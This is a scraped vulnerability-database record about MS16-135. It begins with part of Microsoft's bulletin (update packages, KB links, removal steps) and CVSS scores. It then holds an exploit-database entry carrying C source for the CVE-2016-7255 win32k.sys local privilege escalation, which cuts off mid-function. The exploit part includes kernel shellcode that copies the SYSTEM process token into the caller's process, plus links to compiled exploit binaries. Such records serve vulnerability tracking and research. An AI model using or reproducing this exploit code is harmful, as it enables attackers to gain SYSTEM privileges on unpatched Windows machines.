installation.</td></tr></table></div><br/><br/><h4 class=\"sbody-h4\">Windows Server 2008 R2 (all editions)</h4><span class=\"text-base\">Reference Table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For all supported x64-based editions of Windows Server 2008 R2:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197867</span><span class=\"text-base\"><br/></span>Security only</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows Server 2008 R2:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197868</span><span class=\"text-base\"><br/></span>Monthly rollup</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported Itanium-based editions of Windows Server 2008 R2:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197867</span><span class=\"text-base\"><br/></span>Security only</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported Itanium-based editions of Windows Server 2008 R2:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197868</span><span class=\"text-base\"><br/></span>Monthly rollup</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-27\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">You must restart the system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update that is installed by WUSA, use the <span class=\"text-base\">/Uninstall</span> setup switch or click <strong class=\"uiterm\">Control Panel</strong>, click <strong class=\"uiterm\">System and Security</strong>. Under <strong class=\"uiterm\">Windows Update</strong>, click <strong class=\"uiterm\">View installed updates</strong>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3197867\" id=\"kb-link-28\" target=\"_self\">Microsoft Knowledge Base Article 3197867</a><br/>See <a href=\"https://support.microsoft.com/help/3197868\" id=\"kb-link-29\" target=\"_self\">Microsoft Knowledge Base Article 3197868</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> This update does not add a registry key to validate its installation.</td></tr></table></div><br/><br/><h4 class=\"sbody-h4\">Windows 8.1 (all editions)</h4><span class=\"text-base\">Reference Table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 8.1:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197873</span><span class=\"text-base\"><br/></span>Security only</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 8.1:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197874</span><span class=\"text-base\"><br/></span>Monthly rollup</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 8.1:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197873</span><span class=\"text-base\"><br/></span>Security only</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 8.1:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197874</span><span class=\"text-base\"><br/></span>Monthly rollup</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-30\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">You must restart the system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update that is installed by WUSA, use the <span class=\"text-base\">/Uninstall</span> setup switch or click <strong class=\"uiterm\">Control Panel</strong>, click <strong class=\"uiterm\">System and Security</strong>, and then click <strong class=\"uiterm\">Windows Update</strong>. Under <span class=\"sbody-userinput\">See also</span>, click <span class=\"sbody-userinput\">Installed updates</span>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3197873\" id=\"kb-link-31\" target=\"_self\">Microsoft Knowledge Base Article 3197873</a><br/>See <a href=\"https://support.microsoft.com/help/3197874\" id=\"kb-link-32\" target=\"_self\">Microsoft Knowledge Base Article 3197874</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> This update does not add a registry key to validate its installation.</td></tr></table></div><br/><br/><h4 class=\"sbody-h4\">Windows Server 2012 and Windows Server 2012 R2 (all editions)</h4><span class=\"text-base\">Reference Table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For all supported editions of Windows Server 2012:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197876</span><span class=\"text-base\"><br/></span>Security only</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported editions of Windows Server 2012:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197877</span><span class=\"text-base\"><br/></span>Monthly rollup</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported editions of Windows Server 2012 R2:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197873</span><span class=\"text-base\"><br/></span>Security only</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported editions of Windows Server 2012 R2:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197874</span><span class=\"text-base\"><br/></span>Monthly rollup</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-33\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">You must restart the system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update that is installed by WUSA, use the <span class=\"text-base\">/Uninstall</span> setup switch or click <strong class=\"uiterm\">Control Panel</strong>, click <strong class=\"uiterm\">System and Security</strong>, and then click <strong class=\"uiterm\">Windows Update</strong>. Under <span class=\"sbody-userinput\">See also</span>, click <span class=\"sbody-userinput\">Installed updates</span>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3197876\" id=\"kb-link-34\" target=\"_self\">Microsoft Knowledge Base Article 3197876</a><br/>See <a href=\"https://support.microsoft.com/help/3197877\" id=\"kb-link-35\" target=\"_self\">Microsoft Knowledge Base Article 3197877</a><br/>See <a href=\"https://support.microsoft.com/help/3197873\" id=\"kb-link-36\" target=\"_self\">Microsoft Knowledge Base Article 3197873</a><br/>See <a href=\"https://support.microsoft.com/help/3197874\" id=\"kb-link-37\" target=\"_self\">Microsoft Knowledge Base Article 3197874</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> This update does not add a registry key to validate its installation.</td></tr></table></div><br/><br/><h4 class=\"sbody-h4\">Windows RT 8.1 (all editions)</h4><span class=\"text-base\">Reference Table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Deployment</span></td><td class=\"sbody-td\">The 3197874 Monthly Only update is available via <a href=\"http://go.microsoft.com/fwlink/?linkid=21130\" id=\"kb-link-38\" target=\"_self\">Windows Update</a> only.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart Requirement</span></td><td class=\"sbody-td\">You must restart the system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal Information</span></td><td class=\"sbody-td\">Click <strong class=\"uiterm\">Control Panel</strong>, click <strong class=\"uiterm\">System and Security</strong>, and then click <strong class=\"uiterm\">Windows Update</strong>. Under <span class=\"sbody-userinput\">See also</span>, click <span class=\"sbody-userinput\">Installed updates</span>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File Information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3197874\" id=\"kb-link-39\" target=\"_self\">Microsoft Knowledge Base Article 3197874</a></td></tr></table></div><br/><br/><h4 class=\"sbody-h4\">Windows 10 (all editions)</h4><span class=\"text-base\">Reference Table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 10:<br/><span class=\"text-base\">Windows10.0-KB3198585-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 10:<br/><span class=\"text-base\">Windows10.0-KB3198585-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 10 Version 1511:<br/><span class=\"text-base\">Windows10.0-KB3198586-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 10 Version 1511:<br/><span class=\"text-base\">Windows10.0-KB3198586-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 10 Version 1607:<br/><span class=\"text-base\">Windows10.0-KB3200970-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 10 Version 1607:<br/><span class=\"text-base\">Windows10.0-KB3200970-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-40\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">You must restart the system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update that is installed by WUSA, use the <span class=\"text-base\">/Uninstall</span> setup switch or click <strong class=\"uiterm\">Control Panel</strong>, click <strong class=\"uiterm\">System and Security</strong>, and then click <strong class=\"uiterm\">Windows Update</strong>. Under <span class=\"sbody-userinput\">See also</span>, click <span class=\"sbody-userinput\">Installed updates</span>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3198585\" id=\"kb-link-41\" target=\"_self\">Microsoft Knowledge Base Article 3198585</a><br/>See <a href=\"https://support.microsoft.com/help/3198586\" id=\"kb-link-42\" target=\"_self\">Microsoft Knowledge Base Article 3198586</a><br/>See <a href=\"https://support.microsoft.com/help/3200970\" id=\"kb-link-43\" target=\"_self\">Microsoft Knowledge Base Article 3200970</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> This update does not add a registry key to validate its installation.</td></tr></table></div><br/><br/><h4 class=\"sbody-h4\">Windows Server 2016 (all editions)</h4><span class=\"text-base\">Reference Table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For all supported x64-based editions of Windows Server 2016:<br/><span class=\"text-base\">WindowsServer2016-KB3200970-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-44\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">You must restart the system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update that is installed by WUSA, use the <span class=\"text-base\">/Uninstall</span> setup switch or click <strong class=\"uiterm\">Control Panel</strong>, click <strong class=\"uiterm\">System and Security</strong>, and then click <strong class=\"uiterm\">Windows Update</strong>. Under <span class=\"sbody-userinput\">See also</span>, click <span class=\"sbody-userinput\">Installed updates</span>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3200970\" id=\"kb-link-45\" target=\"_self\">Microsoft Knowledge Base Article 3200970</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> This update does not add a registry key to validate its installation.</td></tr></table></div></div><br/></span></div></div></div><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">How to obtain help and support for this security update</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\">Help for installing updates: <a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-46\" target=\"_self\">Support for Microsoft Update</a><br/><br/>Security solutions for IT professionals: <a href=\"https://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-47\" target=\"_self\">TechNet Security Troubleshooting and Support</a><br/><br/>Help for protecting your Windows-based computer from viruses and malware: <a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-48\" target=\"_self\">Virus Solution and Security Center</a><br/><br/>Local support according to your country: <a href=\"https://www.microsoft.com/en-us/locale.aspx\" id=\"kb-link-49\" target=\"_self\">International Support</a></div><br/></span></div></div></div><a class=\"bookmark\" id=\"fileinfo\"></a></div></body></html>", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-11-08T00:00:00", "type": "mskb", "title": "MS16-135: Security update for Windows kernel-mode drivers: November 8, 2016", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7246", "CVE-2016-7218", "CVE-2016-7214", "CVE-2016-7255", "CVE-2016-7215"], "modified": "2016-11-11T01:17:01", "id": "KB3199135", "href": "https://support.microsoft.com/en-us/help/3199135/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:33", "description": "\nMicrosoft Windows Kernel - win32k.sys NtSetWindowLongPtr Local Privilege Escalation (MS16-135) (2)", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-01-08T00:00:00", "title": "Microsoft Windows Kernel - win32k.sys NtSetWindowLongPtr Local Privilege Escalation (MS16-135) (2)", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7255"], "modified": "2017-01-08T00:00:00", "id": "EXPLOITPACK:3A596E79FE66F4077B2897D4B2D5D53B", "href": "", "sourceData": "/*\nSource: https://ricklarabee.blogspot.com/2017/01/virtual-memory-page-tables-and-one-bit.html\n\nBinary: https://github.com/rlarabee/exploits/raw/8b9eb646516d7f022a010f28018209f331c28975/cve-2016-7255/compiled/cve-2016-7255.exe\nMirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41015.exe\n*/\n\n// ricklarabee.blogspot.com\n\n//This program is free software; you can redistribute it and/or\n//modify it under the terms of the GNU General Public License\n//as published by the Free Software Foundation.\n\n//This program is distributed in the hope that it will be useful,\n//but WITHOUT ANY WARRANTY; without even the implied warranty of\n//MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.See the\n//GNU General Public License for more details.\n\n//You should have received a copy of the GNU General Public License\n//along with this program; if not, write to the Free Software\n//Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n\n// Credits: enrique.nissim@IOActive.com: https://github.com/IOActive/I-know-where-your-page-lives/tree/master/code/CVE-2016-7255\n// PoC from https://github.com/tinysec/public/tree/master/CVE-2016-7255\n\n#include <windows.h>\n#include <wchar.h>\n#include <stdlib.h>\n#include <stdio.h>\n\n#pragma comment(lib,\"ntdll.lib\")\n#pragma comment(lib,\"user32.lib\")\n#pragma comment(lib, \"advapi32\")\n\nUINT64 PML4_BASE;\nUINT PML4_SELF_REF_INDEX;\nUINT64 PML4_SELF_REF = 0xFFFFF6FB7DBEDF68;\n\n#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)\n#define STATUS_UNSUCCESSFUL ((NTSTATUS)0xC0000001L)\n#define GET_INDEX(va) ( ((va >> 39) & 0x1ff )) \n\n////////////////////////////////////////////////////////\n// Define Data Types\n////////////////////////////////////////////////////////\ntypedef struct _SYSTEM_MODULE_INFORMATION_ENTRY {\n PVOID Unknown1;\n PVOID Unknown2;\n PVOID Base;\n ULONG Size;\n ULONG Flags;\n USHORT Index;\n USHORT NameLength;\n USHORT LoadCount;\n USHORT PathLength;\n CHAR ImageName[256];\n} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;\n\ntypedef struct _SYSTEM_MODULE_INFORMATION {\n ULONG Count;\n SYSTEM_MODULE_INFORMATION_ENTRY Module[1];\n} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;\n\ntypedef enum _SYSTEM_INFORMATION_CLASS { \n SystemModuleInformation = 11,\n SystemHandleInformation = 16\n} SYSTEM_INFORMATION_CLASS;\n\ntypedef NTSTATUS (WINAPI *NtQuerySystemInformation_t)(IN SYSTEM_INFORMATION_CLASS SystemInformationClass,\n OUT PVOID SystemInformation,\n IN ULONG SystemInformationLength,\n OUT PULONG ReturnLength);\n\ntypedef NTSTATUS (WINAPI *NtQueryIntervalProfile_t)(IN ULONG ProfileSource,\n\t\t\t\t\t\t\t\t\t\t\t\t\tOUT PULONG Interval);\n\nNtQuerySystemInformation_t NtQuerySystemInformation;\nNtQueryIntervalProfile_t NtQueryIntervalProfile;\n \nchar shellcode[] = {\n\t//0xcc,\n\t0xfa, \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t// CLI\n\t0x9c, \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t// PUSHFQ\n\t0x48, 0xb8, 0x90, 0x90, 0x90 ,0x90 ,0x90, 0x90, 0x90, 0x90, \t// MOV RAX, Original Pointer\n\t0x50, \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t// PUSH RAX\n\t0x51, \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t// PUSH RCX\n\t0x48, 0xb9, 0x90, 0x90, 0x90 ,0x90 ,0x90, 0x90, 0x90, 0x90, \t// MOV RCX, [OverwriteAddr+OverwriteOffset]\n\t0x48, 0x89, 0x01, \t\t\t\t\t\t\t\t\t\t\t\t// MOV QWORD PTR [RCX], RAX\n\t0xb9, 0x90, 0x90, 0x90, 0x90, \t\t\t\t\t\t\t\t\t// MOV ECX, PID\n\t0x53, \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t// PUSH RBX\n\n\t0x65, 0x48, 0x8B, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, \t\t\t// MOV RAX,QWORD PTR gs:0x188\n\t0x48, 0x8B, 0x80, 0xB8, 0x00, 0x00, 0x00,\t\t\t\t\t\t// MOV RAX,QWORD PTR [RAX+0xb8] EPROCESS\n\t0x48, 0x8d, 0x80, 0x90, 0x90, 0x00, 0x00,\t\t\t\t\t\t// LEA RAX,[RAX+0xActiveProcessLinkOffset] \n\t//<tag>\n\t0x48, 0x8b, 0x00,\t\t\t\t\t\t\t\t\t\t\t\t// MOV RAX,QWORD PTR [RAX]\n\t0x48, 0x8b, 0x58, 0xf8,\t\t\t\t\t\t\t\t\t\t\t// MOV RBX,QWORD PTR [RAX-0x8] // UniqueProcessID\n\t0x48, 0x83, 0xfb, 0x04,\t\t\t\t\t\t\t\t\t\t\t// CMP RBX,0x4\n\t0x75, 0xf3,\t\t\t\t\t\t\t\t\t\t\t\t\t\t// JNE <tag>\n\t0x48, 0x8b, 0x98, 0x90, 0x90, 0x90, 0x90,\t\t\t\t\t\t// MOV RBX, QWORD PTR [RAX+0x60] // GET TOKEN of SYSTEM\n\n\t0x53, \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t// PUSH RBX\n\t//<tag2>\n\t0x48, 0x8b, 0x00,\t\t\t\t\t\t\t\t\t\t\t\t// MOV RAX,QWORD PTR [RAX]\n\t0x48, 0x8b, 0x58, 0xf8,\t\t\t\t\t\t\t\t\t\t\t// MOV RBX,QWORD PTR [RAX-0x8] // UniqueProcessID\n\t0x39, 0xcb,\t\t\t\t\t\t\t\t\t\t\t\t\t\t// CMP EBX, ECX // our PID\n\t0x75, 0xf5,\t\t\t\t\t\t\t\t\t\t\t\t\t\t// JNE <tag2>\n\t0x5b, \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t// POP RBX\n\t0x48, 0x89, 0x98, 0x90, 0x90, 0x90, 0x90,\t\t\t\t\t\t// MOV QWORD PTR[RAX + 0x60], RBX\n\n\t0x5b, // POP RBX\n\t0x59, // POP RCX\n\t0x58, // POP RAX\n\t0x9d, // POPFQ\n\n\t0xfb, // STI\n\t0xff, 0xe0 // JMP RAX\n};\n\nULONG __cdecl DbgPrint(__in char* Format, ...)\n{\n\tCHAR* pszDbgBuff = NULL;\n\tva_list VaList = NULL;\n\tULONG ulRet = 0;\n\n\tdo\n\t{\n\t\tpszDbgBuff = (CHAR*)HeapAlloc(GetProcessHeap(), 0, 1024 * sizeof(CHAR));\n\t\tif (NULL == pszDbgBuff)\n\t\t{\n\t\t\tbreak;\n\t\t}\n\t\tRtlZeroMemory(pszDbgBuff, 1024 * sizeof(CHAR));\n\n\t\tva_start(VaList, Format);\n\n\t\t_vsnprintf((CHAR*)pszDbgBuff, 1024 - 1, Format, VaList);\n\n\n\t\tOutputDebugStringA(pszDbgBuff);\n\n\t\tva_end(VaList);\n\n\t} while (FALSE);\n\n\tif (NULL != pszDbgBuff)\n\t{\n\t\tHeapFree(GetProcessHeap(), 0, pszDbgBuff);\n\t\tpszDbgBuff = NULL;\n\t}\n\n\treturn ulRet;\n}\n\n\nint _sim_key_down(WORD wKey)\n{\n\tINPUT stInput = { 0 };\n\n\tdo\n\t{\n\t\tstInput.type = INPUT_KEYBOARD;\n\t\tstInput.ki.wVk = wKey;\n\t\tstInput.ki.dwFlags = 0;\n\n\t\tSendInput(1, &stInput, sizeof(stInput));\n\n\t} while (FALSE);\n\n\treturn 0;\n}\n\nint _sim_key_up(WORD wKey)\n{\n\tINPUT stInput = { 0 };\n\n\tdo\n\t{\n\t\tstInput.type = INPUT_KEYBOARD;\n\t\tstInput.ki.wVk = wKey;\n\t\tstInput.ki.dwFlags = KEYEVENTF_KEYUP;\n\n\t\tSendInput(1, &stInput, sizeof(stInput));\n\n\t} while (FALSE);\n\n\treturn 0;\n}\n\nint _sim_alt_shift_esc()\n{\n\tint i = 0;\n\n\tdo\n\t{\n\t\t_sim_key_down(VK_MENU);\n\t\t_sim_key_down(VK_SHIFT);\n\n\n\t\t_sim_key_down(VK_ESCAPE);\n\t\t_sim_key_up(VK_ESCAPE);\n\n\t\t_sim_key_down(VK_ESCAPE);\n\t\t_sim_key_up(VK_ESCAPE);\n\n\t\t_sim_key_up(VK_MENU);\n\t\t_sim_key_up(VK_SHIFT);\n\n\n\t} while (FALSE);\n\n\treturn 0;\n}\n\n\n\nint _sim_alt_shift_tab(int nCount)\n{\n\tint i = 0;\n\tHWND hWnd = NULL;\n\n\n\tint nFinalRet = -1;\n\n\tdo\n\t{\n\t\t_sim_key_down(VK_MENU);\n\t\t_sim_key_down(VK_SHIFT);\n\n\n\t\tfor (i = 0; i < nCount; i++)\n\t\t{\n\t\t\t_sim_key_down(VK_TAB);\n\t\t\t_sim_key_up(VK_TAB);\n\n\t\t\tSleep(1000);\n\n\t\t}\n\n\n\t\t_sim_key_up(VK_MENU);\n\t\t_sim_key_up(VK_SHIFT);\n\t} while (FALSE);\n\n\treturn nFinalRet;\n}\n\nint _sim_alt_esc(int count)\n{\n\tint i = 0;\n\n\tfor (i = 0; i<count; i++)\n\t{\n\t\t_sim_key_down(VK_MENU);\n\t\t//_sim_key_down(VK_SHIFT);\n\n\n\t\t_sim_key_down(VK_ESCAPE);\n\t\t_sim_key_up(VK_ESCAPE);\n\n\t\t_sim_key_down(VK_ESCAPE);\n\t\t_sim_key_up(VK_ESCAPE);\n\n\t\t_sim_key_up(VK_MENU);\n\t\t//_sim_key_up(VK_SHIFT);\n\n\t}\n\n\treturn 0;\n}\n\n\nint or_address_value_4(__in void* pAddress)\n{\n\tWNDCLASSEXW stWC = { 0 };\n\n\tHWND hWndParent = NULL;\n\tHWND hWndChild = NULL;\n\n\tWCHAR* pszClassName = L\"cve-2016-7255\";\n\tWCHAR* pszTitleName = L\"cve-2016-7255\";\n\n\tvoid* pId = NULL;\n\tMSG stMsg = { 0 };\n\n\tUINT64 value = 0;\n\n\tdo\n\t{\n\n\t\tstWC.cbSize = sizeof(stWC);\n\t\tstWC.lpfnWndProc = DefWindowProcW;\n\t\tstWC.lpszClassName = pszClassName;\n\n\t\tif (0 == RegisterClassExW(&stWC))\n\t\t{\n\t\t\tbreak;\n\t\t}\n\n\t\thWndParent = CreateWindowExW(\n\t\t\t0,\n\t\t\tpszClassName,\n\t\t\tNULL,\n\t\t\tWS_OVERLAPPEDWINDOW | 